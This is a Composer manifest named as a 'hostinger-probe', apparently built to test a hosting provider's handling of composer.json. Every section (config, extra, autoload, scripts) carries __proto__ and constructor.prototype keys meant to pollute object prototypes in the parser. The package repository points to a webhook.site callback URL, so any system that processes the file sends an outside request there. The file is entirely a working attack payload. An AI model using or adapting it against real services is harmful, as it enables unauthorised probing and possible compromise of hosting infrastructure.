{
  "name": "test/hostinger-probe",
  "description": "Prototype pollution probe",
  "type": "project",
  "require": {},

  "repositories": [
    {
      "type": "composer",
      "url": "https://webhook.site/b39da2ab-7ea2-40bf-b3fc-df6368dbd00f"
    }
  ],

  
  "config": {
    "__proto__": {
      "polluted": "config"
    },
    "constructor": {
      "prototype": {
        "polluted": "constructor"
      }
    }
  },

  "extra": {
    "__proto__": {
      "polluted": "extra"
    },
    "constructor": {
      "prototype": {
        "polluted": "extra-constructor"
      }
    }
  },

  "autoload": {
    "__proto__": {
      "polluted": "autoload"
    },
    "psr-4": {
      "Test\\": "src/"
    }
  },

  "scripts": {
    "__proto__": {
      "polluted": "scripts"
    }
  }
}
